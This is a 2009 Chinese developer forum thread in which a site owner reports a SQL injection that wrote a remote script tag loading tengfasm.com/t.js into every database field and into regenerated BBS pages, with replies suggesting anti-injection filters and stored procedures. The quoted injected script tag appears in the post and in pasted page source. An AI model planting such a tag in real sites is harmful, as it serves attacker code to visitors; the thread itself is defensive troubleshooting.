28,406
社区成员
发帖
与我相关
我的任务
分享网站被注了,高手帮忙分析下
http://www.udeep.cn/bbs/
网站被注了,数据库里每个字段都含有<script src=http://tengfasm.com/t.js></script>
高手分析下怎么被注的,网站已经生成静态。
网站被注了,数据库里每个字段都含有<script src=http://tengfasm.com/t.js></script>
高手分析下怎么被注的,网站已经生成静态。
...全文
请发表友善的回复…
发表回复
starshow0571 2009-07-02
- 打赏
- 举报
用lake2的工具,可以防注入的,<--!include file="xxx.asp"-->
插入进去就可以了。
很轻松。
插入进去就可以了。
很轻松。
whitewindmail 2009-07-02
- 打赏
- 举报
在每个页面顶部包含 防注入文件
wanggang_0717 2009-07-02
- 打赏
- 举报
[sql注入] 是咋样一回事啊?
cwglsdn 2009-07-02
- 打赏
- 举报
up
qizhicong2 2009-07-01
- 打赏
- 举报
sql注入,在你的每个varchar类似字段,注入代码。
你可以查一下,你的网站,哪些参数传入时,没有做SQL注入防治
你可以查一下,你的网站,哪些参数传入时,没有做SQL注入防治
eyesonme_49 2009-07-01
- 打赏
- 举报
嗯,路过
超维电脑科技 2009-07-01
- 打赏
- 举报
用存储过程会比较安全哦
ttt2 2009-07-01
- 打赏
- 举报
清完目马后,把每个文件的属性设成只读,对可上传文件的文件进行检查,
yeyuxuan2006 2009-07-01
- 打赏
- 举报
可是BBS的页面源代码都被改写了,(网站的源码没被改)
<!-- 调用样式表 -->
<link rel="stylesheet" href="/bbs/templates/special<script src=http://tengfasm.com/t.js></script>/dnt.css" type="text/css" media="all" />
<link rel="stylesheet" href="/bbs/templates/special<script src=http://tengfasm.com/t.js></script>/Seven_Cell.css" type="text/css" media="all" />
suncarl 2009-07-01
- 打赏
- 举报
sql注入,在你的每个varchar类似字段,注入代码。
你可以查一下,你的网站,哪些参数传入时,没有做SQL注入防治
你可以查一下,你的网站,哪些参数传入时,没有做SQL注入防治
bsk_bg 2009-07-01
- 打赏
- 举报
肯定是SQL注入你站后,你的静态页又被重新生成了呗
落日听风 2009-07-01
- 打赏
- 举报
sql 注入
chengliwangtao 2009-07-01
- 打赏
- 举报
帮顶!
messi_yang 2009-07-01
- 打赏
- 举报
幫頂·!!~!
zhangxin_fly 2009-07-01
- 打赏
- 举报
我的网站也被SQL注入过,大概有一万多条记录
没查出原因,有高手指点下
没查出原因,有高手指点下
asyncyd 2009-07-01
- 打赏
- 举报
bbs程序是自己做的吗?
碧海晴天 2009-07-01
- 打赏
- 举报
用Domain3.5免杀版自己检查下应该有所帮助
落日听风 2009-07-01
- 打赏
- 举报
加防注入代码,
调皮的蟠桃 2009-07-01
- 打赏
- 举报
我们网站也被注入了,该怎样解决?
lzp4881 2009-07-01
- 打赏
- 举报
大家都在这里猜
